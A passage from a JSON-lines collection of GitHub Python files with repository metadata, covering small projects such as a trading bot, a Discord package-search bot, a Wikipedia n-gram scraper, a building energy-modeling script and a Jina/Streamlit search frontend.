0))\r\n\t#UPDATE\r\n\tpygame.display.flip()\r\n\r\n\ttimer.tick(60)","repo_name":"ApereLieZ/woodcutter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"17252728839","text":"__author__ = 'Matthew'\n\nimport math\nimport sma_array as sa\nimport sma_segment as ss\n\nclass Tentacle(object):\n\n # length of lever arm\n r = 35 # unit = mm\n\n # saturation values\n min_input = 0\n\n def __init__(self, num_seg=10):\n\n # instance parameters\n self.array = sa.sma_array(num_seg=num_seg)\n self.array.set_all_off()\n #total length of SMA at 90 degree (neutral)\n self.L0 = (ss.sma_segment.hot_length + ss.sma_segment.cold_length)*(num_seg/2)\n\n # Tentacle parameters\n Tentacle.max_input = num_seg\n #Tentacle.r = self.array.get_length_range()/(2*math.cos(math.radians(60)))\n\n\n def get_angle(self, deg=True):\n angle = math.acos((self.L0-self.array.get_total_length())/Tentacle.r)\n\n if deg:\n return math.degrees(angle)\n else:\n return angle\n\n\n def update(self, input_val, num_step=1, sim_step=0.01):\n if input_val < Tentacle.min_input:\n input_val = Tentacle.min_input\n elif input_val > Tentacle.max_input:\n input_val = Tentacle.max_input\n\n self.array.turn_on(input_val, num_step=num_step, sim_step=sim_step)\n\n\n","repo_name":"MattChanTK/SculptureLearning","sub_path":"TentacleControl_Simulation/Tentacle.py","file_name":"Tentacle.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29823868087","text":"#!/usr/bin/env python3\nimport discord\nimport cmds.cmdutils\nfrom cmds.cmdutils import _c\nimport urllib.parse\nimport requests\n\nasync def handle_message(message: discord.Message):\n await message.channel.trigger_typing()\n \n lex = cmds.cmdutils.lex_command(message)\n cmd = _c(lex)\n\n if cmd.query_length == 0:\n await message.channel.send(\"Not enough args!\")\n \n req = requests.get(\"https://archlinux.org/packages/search/json/?q={}&repo=Community&repo=Core&repo=Extra&repo=Multilib\".format(urllib.parse.quote(cmd.content, safe='')))\n json = req.json()\n \n pkgs = []\n\n for pkg in json[\"results\"]:\n pkgs.append(\" ‣ `{}` - {}\\n\".format(pkg[\"pkgname\"], pkg[\"pkgdesc\"]))\n\n try:\n await cmd.st(\"**{} search results for `{}` in Arch Linux**\\n\\n\".format(len(pkgs), cmd.content) + \"\".join(pkgs[:3]))\n except:\n await cmd.st(\"There was an error or your result did not return anything!\")\n\nasync def handle_aur_message(message: discord.Message):\n await message.channel.trigger_typing()\n \n lex = cmds.cmdutils.lex_command(message)\n cmd = _c(lex)\n\n if cmd.query_length == 0:\n await cmd.st(\"Not enough args!\")\n \n req = requests.get(\"https://aur.archlinux.org/rpc/?v=5&type=info&arg={}\".format(urllib.parse.quote(cmd.content, safe='')))\n json = req.json()\n\n print(json)\n \n pkgs = []\n\n for pkg in json[\"results\"]:\n pkgs.append(\" ‣ `{}` - {}\\n\".format(pkg[\"Name\"], pkg[\"Description\"]))\n\n try:\n await cmd.st(\"**{} search results for `{}` in the AUR**\\n\\n\".format(len(pkgs), query) + \"\".join(pkgs[:3]))\n except:\n await cmd.st(\"There was an error or your result did not return anything!\")","repo_name":"pontaoski/unnamed-linux-bot","sub_path":"cmds/pacman.py","file_name":"pacman.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"28936310571","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\n\nread_file = pd.read_csv('iris.csv')\n\ndef input_new_data():\n print(\"Masukkan data baru:\")\n sepallength = float(input(\"sepallength: \"))\n sepalwidth = float(input(\"sepalwidth: \"))\n petallength = float(input(\"petallength: \"))\n petalwidth = float(input(\"petalwidth: \"))\n return [sepallength, sepalwidth, petallength, petalwidth]\n\ndef calculate_score(data, averages):\n return sum([a*b for a,b in zip(data, averages)])\n\ndef predict_species(new_data, training_data, averages):\n new_score = calculate_score(new_data, averages)\n closest_distance = float('inf')\n nearest_species = None\n \n for index, row in training_data.iterrows():\n existing_data = row[:-1].tolist()\n species = row['class']\n existing_score = calculate_score(existing_data, averages)\n distance = abs(new_score - existing_score)\n if distance < closest_distance:\n closest_distance = distance\n nearest_species = species\n\n return nearest_species\n\nX = read_file.iloc[:, :-1]\ny = read_file.iloc[:, -1]\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.5, shuffle=True)\n\ntraining_data = pd.concat([X_train, y_train], axis=1)\naverages = X_train.mean().tolist()\n\nwhile True:\n new_data = input_new_data()\n predicted_species = predict_species(new_data, training_data, averages)\n print(f'Hasil prediksi untuk data baru: {predicted_species}')\n \n new_row = pd.Series(new_data + [predicted_species], index=read_file.columns)\n read_file = pd.concat([read_file, new_row.to_frame().T], ignore_index=True)\n \n read_file.to_csv('iris.csv', index=False)\n continue_input = input(\"Apakah ingin memasukkan data baru lagi? (y/n): \")\n if continue_input.lower() != 'y':\n break","repo_name":"Ramadhanputra1121/Assignment-2-PKB","sub_path":"predictOnly.py","file_name":"predictOnly.py","file_ext":"py","file_size_in_byte":1831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22027042881","text":"# -*- coding: utf-8 -*-\r\nimport numpy\r\nimport tpqoa\r\n\r\ninstrument = 'EUR_USD'\r\n\r\nclass SMATrader(tpqoa.tpqoa):\r\n def __init_(self,config_file, SMA1, SMA2, bar_length, units):\r\n super(SMATrader, self).__init__(config_file)\r\n self.raw = pd.DataFrame()\r\n \r\n self.sma1 = SMA1\r\n self.sma2 = SMA2\r\n self.min_length = SMA2 + 1\r\n self.bar_length = bar_length\r\n self.position = 0\r\n \r\n def on_success(self,time,bid,ask,bar_length, ticks):\r\n print(self.ticks, end = ' ')\r\n self.raw = self.raw.append(pd.DataFrame({'bid':bid, 'ask':ask},index=[pd.Timestamp(time)]))\r\n self.data = self.raw.resample(self.bar_length, label='right').last() \r\n self.data['mid'] = self.data.mean(axis=1)\r\n \r\n if len(self.data) > self.min_length:\r\n if self.position in [0,-1]:\r\n self.min_length += 1\r\n self.data['SMA1'] = self.data['mid'].rolling(self.SMA1).mean()\r\n self.data['SMA2'] = self.data['mid'].rolling(self.SMA2).mean()\r\n\r\n if self.data['SMA1'].iloc[-2] > self.data['SMA2'].iloc[-2]: # this is because the last number might actually not be the right one\r\n print(55 * '=')\r\n print(\"Buy order ...\")\r\n print(55 * '=')\r\n self.create_order(self.stream_instrument, units = ( 1 - self.position )*self.units)\r\n self.position = 1\r\n ### this is where you place your trade\r\n api.create_order(instrument, units=50)\r\n elif self.position in [0,1]:\r\n if self.data['SMA1'].iloc[2] < self.data['SMA2'].iloc[-2]:\r\n print(55 * '=')\r\n print(\"Sell order ...\")\r\n print(55 * '=')\r\n self.create_order(self.stream_instrument, units = -( 1 + self.position )*self.units)\r\n self.position = -1 \r\n \r\n \r\nsma = SMATrader('oanda.cfg',5, 10, '5s', 200)\r\nsma.stream_data(instrument, stop=150)\r\nsma.print_transactions(tid=0)\r\nsma.get_transactions(tid=0)","repo_name":"EdenHouseDevelopment/cqf_course","sub_path":"SMATrader.py","file_name":"SMATrader.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"18689156554","text":"import click\nfrom GLOBAL_VARIABLES import DATABASE_LOCATION, FOLDER_PLOT_DUMP\nfrom db_api.plots.profit_rate import profit_rate\nimport subprocess\n\n\n@click.command()\n@click.argument('buyin', required=False, default=None)\ndef show_profit_rate(buyin):\n plot_name = profit_rate(\n buyin=buyin,\n save_to=FOLDER_PLOT_DUMP,\n database_file_path=DATABASE_LOCATION\n )\n filepath__ = FOLDER_PLOT_DUMP + plot_name\n subprocess.call(['open', filepath__])\n","repo_name":"michaelcukier/Poker-Hand-Tracker","sub_path":"cli_commands/show_profit_rate.py","file_name":"show_profit_rate.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"81"} +{"seq_id":"42644292330","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nFunctions for:\n1) generating character n-grams from Wikipedia pages, to find most frequent n-grams later on;\n2) matching most frequent n-grams in a text and finding coverage [%], as an indicator of text quality.\n\nUsage from a folder where \"nifty\" package is visible:\n\n1) python -m nifty.algo.ngrammer wikipedia pl 10 10000000 > ngrams_pl_10.txt\n cat ngrams_pl_10.txt | env LC_ALL=C sort | uniq -c | sort -n\n cat ngrams_it_10.txt | env LC_ALL=C sort | uniq -c | sort -nr | head -n300000 > freq_ngrams_it_10.txt\n\n2) python -m nifty.algo.ngrammer score document.txt ...\n\n\nThis code is compatible with Python 2 & 3.\n\n@author: Marcin Wojnarski\n@contact: mwojnars@ns.onet.pl\n\"\"\"\n\n\nfrom __future__ import print_function\nimport os, sys, re, random, unicodedata, chardet, click\nfrom itertools import islice\nfrom collections import namedtuple\nfrom six.moves import urllib\nfrom glob import glob\n\nif __name__ != \"__main__\":\n from ..text import merge_spaces, html2text_smart\nelse:\n from nifty.text import merge_spaces, html2text_smart\n\n\nPY3 = (sys.version_info.major >= 3)\n\nPATH = os.path.dirname(__file__) + '/'\n\nRE = re.compile\n\n\n#####################################################################################################################################################\n#####\n##### WIKIPEDIA SCRAPING & NGRAMS EXTRACTION\n#####\n\nclass Wikipedia(object):\n \"\"\"\n Scraper of Wikipedia pages.\n \"\"\"\n \n @classmethod\n def get_random_page(cls, lang = 'pl'):\n \n resp = urllib.request.urlopen('http://%s.wikipedia.org/wiki/Special:Random' % lang)\n status = getattr(resp, 'status', None) or getattr(resp, 'code')\n if status == 200:\n return resp.read()\n else:\n raise Exception(\"Failed to open page, status code: %s\" % resp.status)\n \n @classmethod\n def stream_pages(cls, lang = 'pl'):\n \n while True:\n try:\n page = cls.get_random_page(lang)\n enc = chardet.detect(page)['encoding']\n page = page.decode(enc)\n yield page\n \n except Exception as ex:\n print(ex)\n \n \n @classmethod\n def stream_plaintext(cls, lang = 'pl', truncate = True,\n _frame = RE(r'(?uis)^.*|.*$'),\n _script = RE(r'(?uis)]*)?>.*?'),\n _style = RE(r'(?uis)]*)?>.*?'),\n _mw_cat = RE(r'(?uis)]*\\bcatlinks\\b.*'), # MediaWiki categories box\n _mw_nav = RE(r'(?uis)]*mw-data-after-content.*'), # MediaWiki navigation box (left panel) and footer\n _block = RE(r'(?uis)|||'),\n _latin = RE(r'(?uis)[a-zA-Z\\d\\{\\}/\\\\\\&|\\.,;*\\-' u'–°' r']+|\\(\\s*\\)'),\n _brackets = RE(r'(?uis)\\[.*?\\]|\\(\\s*\\)'),\n ):\n \n def as_plaintext(block):\n text = html2text_smart(block)\n text = _brackets.sub(' ', text)\n \n if lang in ('zh','jp'):\n text = _latin.sub('', text)\n \n text = merge_spaces(text)\n\n return text\n \n for page in cls.stream_pages(lang):\n \n #print(page)\n #print('---' * 30)\n \n if truncate:\n page = _frame .sub(' ', page)\n page = _script.sub(' ', page)\n page = _style. sub(' ', page)\n page = _mw_cat.sub(' ', page)\n page = _mw_nav.sub(' ', page)\n \n texts = map(as_plaintext, _block.findall(page))\n texts = filter((lambda t: len(t) > 1), texts)\n \n yield '\\n'.join(texts)\n\n\n @classmethod\n def stream_blocks(cls, lang = 'pl', min_len_block = 100, drop_biblio = True,\n _biblio = RE(r'(?uis)^\\s*' u'\\u2191' r'.*|^\\s*\\^.*'), # ↑ ^ ..... (bibliography entries)\n ):\n \n for text in cls.stream_plaintext(lang):\n \n for block in text.split('\\n'):\n if None != min_len_block > len(block): continue\n if drop_biblio and _biblio.match(block): continue\n yield block\n \n\n @classmethod\n def stream_ngrams(cls, lang, length, limit = None, *args, **kwargs):\n \n length = int(length)\n if limit: limit = int(limit)\n \n count = 0\n for block in cls.stream_blocks(lang, *args, **kwargs):\n block = block.lower()\n for i in range(len(block)-length+1):\n yield block[i:i+length]\n count += 1\n if count % 1000 == 0: print(count, file = sys.stderr)\n if None != limit <= count: return\n \n\n#####################################################################################################################################################\n#####\n##### TEXT SCORING\n#####\n\nclass Scorer(object):\n \"\"\"\n In method score(), Scorer takes a text and finds in it all overlapping matches of frequent n-grams (loaded in __init__),\n to calculate: (1) the fraction of text matched (after lowercase + spaces merged); (2) no. of different unique n-grams matched.\n \"\"\"\n \n verbose = True\n \n def __init__(self, minfreq = 50, lang = '*', length = '*', path = PATH + \"ngrams/\"):\n \n # filtering out strings like:\n # athbf {x} \\mathbf {x\n # \\color {gr r {gray}{0 &\\color {g {gray}{0}&\n # {\\displays playstyle aystyle {\\ style \\mat\n # \\operatorn 0 0 0 0 0 x • xi • x\n re_invalid = RE(r\"\\\\mat|\\\\col|\\\\disp|\\\\oper|\\{|\\}|\\&\\\\|displayst|aystyle|0 0 0|\" u\"x • x|codec can't decode\")\n \n def invalid(s):\n return re_invalid.search(s)\n \n if self.verbose: print(\"Loading frequent n-grams (phrases)...\")\n \n filenames = glob(path + \"freq_ngrams_%s_%s.txt\" % (lang, length))\n if not filenames: raise Exception(\"No file with ngrams found\")\n \n phrases = []\n for fn in filenames:\n \n target_len = int(fn.rsplit('.',1)[0].rsplit('_',1)[1])\n f = open(fn, 'rt')\n \n for line in f:\n if not PY3: line = line.decode('utf-8')\n line = line.lstrip()\n if line[-1] == '\\n': line = line[:-1]\n if not line: continue\n assert ' ' in line\n \n split = line.index(' ')\n freq = int(line[:split])\n ngram = line[split+1:]\n if len(ngram) != target_len:\n if \"codec can't decode\" not in ngram:\n print(\"INCORRECT LENGTH (%s): [%s]\" % (len(ngram), ngram))\n else: \n assert len(ngram) == target_len\n \n if freq < minfreq: continue\n if invalid(ngram): continue\n \n phrases.append(ngram)\n #print(freq, '[%s]' % ngram)\n \n if self.verbose: print(\"Phrases (with duplicates): \", len(phrases))\n phrases = set(phrases)\n if self.verbose: print(\"Phrases (no duplicates): \", len(phrases))\n\n if self.verbose: print(\"Building regex pattern...\")\n phrases = map(re.escape, phrases)\n self.re_phrases = RE(\"(?iu)(?=(%s))\" % \"|\".join(phrases)) # standard re.compile() works 2-3x faster than regex.compile() that allows overlapped=True in finditer()\n #print(self.re_phrases.pattern)\n\n def score(self, text):\n \n text = text.lower()\n text = merge_spaces(text)\n total_matched = 0\n unique = set()\n \n last = 0\n for match in self.re_phrases.finditer(text):\n phrase = match.group(1)\n start = match.start() # we look for OVERLAPPING matches! for this reason, we use lookahead matches in the regex and the actual match returned is always 0-length\n stop = start + len(phrase) # we need to take group(1) - from inside the lookahead match - to retrieve the length of the matched substring\n unique.add(phrase)\n if start < last: start = last\n assert start < stop\n \n if self.verbose:\n click.secho(text[last:start], nl = False)\n click.secho(text[start:stop], nl = False, bg = 'blue')\n \n total_matched += stop - start\n last = stop\n \n if self.verbose: click.secho(text[last:])\n \n #matches = self.re_phrases.findall(text)\n #total_matched = sum(map(len, matches))\n total_len = len(text)\n \n if self.verbose: print(\"Matched characters: %s of %s\" % (total_matched, total_len))\n return float(total_matched) / total_len, len(unique)\n\n\n#####################################################################################################################################################\n#####\n##### MAIN\n#####\n\nif __name__ == '__main__':\n\n cmd = sys.argv[1]\n \n if cmd == 'wikipedia':\n \n for ngram in Wikipedia.stream_ngrams(*sys.argv[2:]):\n print(ngram if PY3 else ngram.encode('utf-8'))\n \n elif cmd == 'score':\n \n scorer = Scorer()\n for fname in sys.argv[2:]:\n text = open(fname).read()\n if not PY3: text = text.decode('utf-8')\n print(\"Matching...\")\n score, unique = scorer.score(text)\n print(\"%.2f%% matched (%d unique frequent n-grams)\" % (score * 100, unique), '-', fname)\n \n else:\n print(\"Unknown command:\", cmd)\n \n \n","repo_name":"mwojnars/nifty","sub_path":"algo/ngrammer.py","file_name":"ngrammer.py","file_ext":"py","file_size_in_byte":10087,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"81"} +{"seq_id":"5636456018","text":"#!/usr/bin/env python3\n#\n# problem statement:\n#\n# The prime factors of 13195 are 5, 7, 13 and 29.\n#\n# What is the largest prime factor of the number 600851475143 ?\n\n#import pprint # pprint.pprint([\"hello\", \"world\"])\nimport math\n\ndef is_prime(x):\n for factor in range(2,int(math.sqrt(x))+1):\n if x % factor == 0:\n return False\n #print(factor)\n return True\n\n\nsum = 0\nfactor_me = 600851475143\nfor factor in range(3, 775147): # sqrt(600851475143)\n if factor % 3 == 0 or factor % 5 == 0 or factor % 7 == 0:\n next\n if factor_me % factor == 0 and is_prime(factor):\n print(factor)\n\n\n\n\n\n\n","repo_name":"DeeNewcum/learn_python","sub_path":"project_euler/pe3.py","file_name":"pe3.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13890035065","text":"\"\"\"\nThis file contains a workflow for modeling cycle # 1 in ASHRAE Standard 209:\nEnergy Simulation Aided Design for Buildings except Low-Rise Residential Buildings (ANSI Approved)\n\nModeling cycle 1 analysis:\nCreate energy models to calculate annual building energy by end use and peak heating and cooling loads with identical\nHVAC systems. Perform a sensitivity analysis by varying the following building characteristics:\na. Building geometry\nb. Window-to-wall ratio, by orientation, and shading options\n(if applicable)\nc. Orientation\nd. Thermal performance of the envelope and structure\n\nHow to use this python script:\n1. Get a BuildSimHub account - it is free of charge and you can get 2 free simulation hours\n by following the walk-through. https://my.buildsim.io/register.html\n2. Download the API package from GITHUB\n3. Copy the project_api_key from your demo project / any new projects and paste it to the project_api_key\n4. Copy a whole building model from the model library (List of PNNL reference and IECC models)\n5. Copy the model_api_key and paste to the variable: model_api_key\n6. Define parameters in the lists under model_api_key\n7. Run the script!\nYou are done\n\nAuthor: Weili Xu\nDate: 4/25/2018\n\n\"\"\"\n\nimport BuildSimHubAPI as bsh_api\nimport BuildSimHubAPI.postprocess as pp\n\n# paste your BuildSimHub project api key here:\nproject_api_key = \"b2809d88-847d-474e-91a5-8763b6b81a27\"\n# paste your BuildSimHub model api key here:\nmodel_api_key = \"babac3ee-9fd0-4d62-8f5d-6fd706492607\"\n# fill in your investigation values\nbldg_orientation = []\nwwr_south = [0.2, 0.6]\nwwr_north = []\nwwr_east = []\nwwr_west = [0.3, 0.4]\noverhang_south = []\noverhang_north = []\noverhang_east = []\noverhang_west = []\nfin_south = []\nfin_north = []\nfin_west = []\nfin_east = []\nwall_rvalue = [10, 30]\nwall_unit = \"ip\"\nroof_rvalue = []\nroof_unit = \"ip\"\nwindow_uvalue = []\nwindow_u_unit = 'ip'\nwindow_shgc = []\n\n\"\"\"\nBelow are the standard API code - You don't need to touch the code below\nunless you want to process different types of results than this script.\n\n\"\"\"\n# Create a new parametric job\nbsh = bsh_api.BuildSimHubAPIClient()\nnew_pj = bsh.new_parametric_job(project_api_key, model_api_key)\n\nmeasures = list()\n\n# Define EEMs\norientation = bsh_api.measures.BuildingOrientation()\norientation.set_datalist(bldg_orientation)\nmeasures.append(orientation)\n\nwwrs = bsh_api.measures.WindowWallRatio('s')\nwwrs.set_datalist(wwr_south)\nmeasures.append(wwrs)\n\nwwrn = bsh_api.measures.WindowWallRatio('n')\nwwrn.set_datalist(wwr_north)\nmeasures.append(wwrn)\n\nwwrw = bsh_api.measures.WindowWallRatio('w')\nwwrw.set_datalist(wwr_west)\nmeasures.append(wwrw)\n\nwwre = bsh_api.measures.WindowWallRatio('e')\nwwre.set_datalist(wwr_east)\nmeasures.append(wwre)\n\noverhangn = bsh_api.measures.ShadeOverhang('n')\noverhangn.set_datalist(overhang_north)\nmeasures.append(overhangn)\n\noverhangs = bsh_api.measures.ShadeOverhang('s')\noverhangs.set_datalist(overhang_south)\nmeasures.append(overhangs)\n\noverhangw = bsh_api.measures.ShadeOverhang('w')\noverhangw.set_datalist(overhang_west)\nmeasures.append(overhangw)\n\noverhange = bsh_api.measures.ShadeOverhang('e')\noverhange.set_datalist(overhang_east)\nmeasures.append(overhange)\n\nfinn = bsh_api.measures.ShadeFin('n')\nfinn.set_datalist(fin_north)\nmeasures.append(finn)\n\nfins = bsh_api.measures.ShadeFin('s')\nfins.set_datalist(fin_south)\nmeasures.append(fins)\n\nfinw = bsh_api.measures.ShadeFin('w')\nfinw.set_datalist(fin_west)\nmeasures.append(finw)\n\nfine = bsh_api.measures.ShadeFin('e')\nfine.set_datalist(fin_east)\nmeasures.append(fine)\n\nwallr = bsh_api.measures.WallRValue(wall_unit)\nwallr.set_datalist(wall_rvalue)\nmeasures.append(wallr)\n\nroofr = bsh_api.measures.RoofRValue(roof_unit)\nroofr.set_datalist(roof_rvalue)\nmeasures.append(roofr)\n\nwinu = bsh_api.measures.WindowUValue(window_u_unit)\nwinu.set_datalist(window_uvalue)\nmeasures.append(winu)\n\nwinshgc = bsh_api.measures.WindowSHGC()\nwinshgc.set_datalist(window_shgc)\nmeasures.append(winshgc)\n\n# Add measures to the new parametric study\nnew_pj.add_model_measures(measures)\n\n# Now we start!\nresults = new_pj.submit_parametric_study(track=True)\nprint(results)\n\n'''\nBelow are post-processing code\nResults carries the API calls to retrieve your parametric simulations\n\nIn this case, we showed two post-process methods:\n1. get the results in pandas dataframe\n2. plot it in a parallel coordinate chart.\n'''\nif results:\n # Collect results\n result_dict = results.net_site_eui()\n result_unit = results.last_parameter_unit\n # Plot\n plot = pp.ParametricPlot(result_dict, result_unit)\n print(plot.pandas_df())\n\n","repo_name":"weilix88/buildsimhub_python_api","sub_path":"modelingstandard/ModelCycleOne.py","file_name":"ModelCycleOne.py","file_ext":"py","file_size_in_byte":4581,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"81"} +{"seq_id":"24089145945","text":"\"\"\"\r\nImportamos la biblioteca difflib, que nos ayudará a buscar nombres similares.\r\n\"\"\"\r\nimport difflib\r\n\r\n# Lista de nombres conocidos y sus códigos IATA en minúsculas\r\nnombres_abreviados = {\r\n \"ciudad de méxico\": [\"ciudad de méxico\", \"mex\", \"cdmx\", \"mxm\", \"mejico\"],\r\n \"guadalajara\": [\"guadalajara\", \"gdl\", \"miguel hidalgo y costilla\"],\r\n \"cancun\": [\"cancun\", \"cun\"],\r\n \"acapulco\": [\"acapulco\", \"aca\", \"pulc\"],\r\n \"aguascalientes\": [\"aguascalientes\", \"agu\"],\r\n \"guanajuato\": [\"guanajuato\", \"bjx\"],\r\n \"ciudad juárez\": [\"ciudad juárez\", \"cjs\", \"juá\"],\r\n \"ciudad del carmen\": [\"ciudad del carmen\", \"cme\", \"car\"],\r\n \"chetumal\": [\"chetumal\", \"ctm\"],\r\n \"chihuahua\": [\"chihuahua\", \"cuu\"],\r\n \"cozumel\": [\"cozumel\", \"czm\", \"ozu\"],\r\n \"hermosillo\": [\"hermosillo\", \"hmo\", \"rmo\"],\r\n \"santa maría huatulco\": [\"huatulco\", \"hux\", \"santa maría huatulco\"],\r\n \"mérida\": [\"mérida\", \"mid\"],\r\n \"oaxaca\": [\"oaxaca\", \"oax\", \"axa\"],\r\n \"puebla\": [\"puebla\", \"pbc\", \"ebla\"],\r\n \"amsterdam\": [\"amsterdam\", \"ams\"],\r\n \"atlanta\": [\"atlanta\", \"atl\"],\r\n \"bogotá\": [\"bogotá\", \"el dorado\", \"bog\"],\r\n \"belize\": [\"belize\", \"philip s.w. goldson\", \"bze\"],\r\n \"paris\": [\"paris\", \"cdg\", \"paris-charles de gaulle\"],\r\n \"ciudad obregón\": [\"ciudad obregón\", \"cen\"],\r\n \"north carolina\": [\"north carolina\", \"charlotte-douglas\", \"clt\"],\r\n \"texas\": [\"texas\", \"dallas/fort worth\", \"dfw\"],\r\n \"guatemala city\": [\"guatemala city\", \"gua\"],\r\n \"habana\": [\"habana\",\"havana\", \"hav\", \"cuba\", \"cub\", \"HAV\", \"OACI\", \"MUHA\"],\r\n \"houston\": [\"houston\", \"iah\"],\r\n \"queens\": [\"queens\", \"jfk\"],\r\n \"los angeles\": [\"lax\", \"los angeles\"],\r\n \"lima\": [\"lima\", \"lim\"],\r\n \"madrid\": [\"madrid\", \"mad\"],\r\n \"miami\": [\"miami\", \"mia\"],\r\n \"mazatlán\": [\"mazatlán\", \"mzt\"],\r\n \"chicago\": [\"chicago\", \"ord\"],\r\n \"houston\": [\"houston\", \"phl\"],\r\n \"philadelphia\": [\"philadelphia\", \"phl\"],\r\n \"phoenix\": [\"phoenix\", \"phx\"],\r\n \"santiago\": [\"santiago\", \"scl\"],\r\n \"vancouver\": [\"vancouver\", \"yvr\"],\r\n \"toronto\": [\"toronto\", \"yyz\"],\r\n \"puerto vallarta\": [\"puerto vallarta\", \"pvr\", \"licenciado gustavo díaz ordaz\"],\r\n \"puerto escondido\": [\"puerto escondido\", \"pxm\"],\r\n \"querétaro\": [\"querétaro\", \"qro\", \"eré\"],\r\n \"san luis potosí\": [\"san luis potosí\", \"slp\", \"otosí\"],\r\n \"tampico\": [\"tampico\", \"tam\"],\r\n \"toluca\": [\"toluca\", \"tlc\", \"ait\"],\r\n \"torreón\": [\"francisco sarabia\", \"trc\", \"torreón\"],\r\n \"villahermosa\": [\"carlos rovirosa pérez\", \"vsa\", \"villahermosa\"],\r\n \"zacatecas\": [\"zacatecas\", \"zcl\"],\r\n \"ixtapa-zihuatanejo\": [\"zihuatanejo\", \"zih\"],\r\n \"zihuatanejo\": [\"zihuatanejo\", \"zih\"],\r\n \"tijuana\": [\"tijuana\", \"tij\"],\r\n \"sonora\": [\"sonora\", \"son\", \"Hermosillo\", \"HMO\"],\r\n \"veracruz\": [\"veracruz\", \"ver\", \"acruz\"],\r\n \"monterrey\": [\"monterrey\", \"mty\", \"mon\"],\r\n \"peru\" : [\"cuba\", \"per\", \"SPJC\"],\r\n \"bolivia\" : [\"bolivia\", \"bol\", \"CBB\"]\r\n}\r\n\r\ndef encontrar_nombre_similar(entrada_usuario):\r\n \"\"\"\r\n Función que busca un nombre similar en la lista de nombres conocidos\r\n basándose en la entrada proporcionada por el usuario.\r\n\r\n Args:\r\n entrada_usuario (str): La entrada del usuario.\r\n\r\n Returns:\r\n str: El nombre similar encontrado o None si no se encuentra ninguna coincidencia.\r\n \"\"\"\r\n if isinstance(entrada_usuario, str):\r\n entrada_usuario = entrada_usuario.lower()\r\n else:\r\n # Manejar la entrada incorrecta de alguna manera, como mostrar un mensaje de error.\r\n return None\r\n \r\n for nombre, abreviaturas in nombres_abreviados.items():\r\n if entrada_usuario in abreviaturas:\r\n return nombre\r\n coincidencias = difflib.get_close_matches(entrada_usuario, nombres_abreviados.keys(), n=1, cutoff=0.4)\r\n \r\n if coincidencias:\r\n return coincidencias[0]\r\n else:\r\n return None","repo_name":"Anthonyafk/Clima-Connect","sub_path":"myproject/utils/SintaxisErrorsbyUser.py","file_name":"SintaxisErrorsbyUser.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17859108463","text":"import base64\nimport os\nimport sys\nfrom copy import deepcopy\nfrom urllib.request import urlopen\n\nimport av\nimport numpy as np\nimport streamlit as st\nfrom docarray import DocumentArray\nfrom jina import Client, Document\nfrom streamlit_webrtc import ClientSettings, webrtc_streamer\n\nWEBRTC_CLIENT_SETTINGS = ClientSettings(\n rtc_configuration={\"iceServers\": [{\"urls\": [\"stun:stun.l.google.com:19302\"]}]},\n media_stream_constraints={\"video\": True, \"audio\": False},\n)\n\n\nroot_data_dir = (\n 'https://storage.googleapis.com/jina-fashion-data/data/one-line/datasets/'\n)\n\nds_set = {\n 'nft-monkey',\n 'deepfashion',\n 'nih-chest-xrays',\n 'stanford-cars',\n 'bird-species',\n 'best-artworks',\n 'geolocation-geoguessr',\n 'rock-lyrics',\n 'pop-lyrics',\n 'rap-lyrics',\n 'indie-lyrics',\n 'metal-lyrics',\n}\n\n\ndef deploy_streamlit():\n \"\"\"\n We want to provide the end-to-end experience to the user.\n Please deploy a streamlit frontend on k8s/local to access the api.\n You can get the starting point for the streamlit application from alex.\n \"\"\"\n setup_session_state()\n print('Run Streamlit with:', sys.argv)\n _, host, port, output_modality, data = sys.argv\n da_img = None\n da_txt = None\n\n # General\n TOP_K = 9\n DEBUG = os.getenv(\"DEBUG\", False)\n DATA_DIR = \"../data/images/\"\n\n if data in ds_set:\n if output_modality == 'image':\n output_modality_dir = 'jpeg'\n data_dir = root_data_dir + output_modality_dir + '/'\n da_img, da_txt = load_data(data_dir + data + '.img10.bin'), load_data(\n data_dir + data + '.txt10.bin'\n )\n elif output_modality == 'text':\n # for now deactivated sample images for text\n output_modality_dir = 'text'\n data_dir = root_data_dir + output_modality_dir + '/'\n da_txt = load_data(data_dir + data + '.txt10.bin')\n\n if output_modality == 'text':\n # censor words in text incl. in custom data\n from better_profanity import profanity\n\n profanity.load_censor_words()\n\n class UI:\n about_block = \"\"\"\n ### About\n This is a meme search engine using [Jina's neural search framework](https://github.com/jina-ai/jina/).\n - [Live demo](https://examples.jina.ai/memes)\n - [Play with it in a notebook](https://colab.research.google.com/github/jina-ai/workshops/blob/main/memes/meme_search.ipynb) (t-only)\n - [Repo](https://github.com/alexcg1/jina-meme-search)\n - [Dataset](https://www.kaggle.com/abhishtagatya/imgflipscraped-memes-caption-dataset)\n \"\"\"\n\n css = \"\"\"\n \n \"\"\"\n\n def search_by_t(input, server, port, limit=TOP_K):\n print('initialize client at', server, port)\n client = Client(host=server, protocol=\"grpc\", port=port)\n print('search text', server, port)\n response = client.search(\n Document(text=input),\n parameters={\"limit\": limit, 'filter': {}},\n return_results=True,\n show_progress=True,\n )\n\n return response[0].matches\n\n def search_by_file(document, server, port, limit=TOP_K):\n \"\"\"\n Wrap file in Jina Document for searching, and do all necessary conversion to 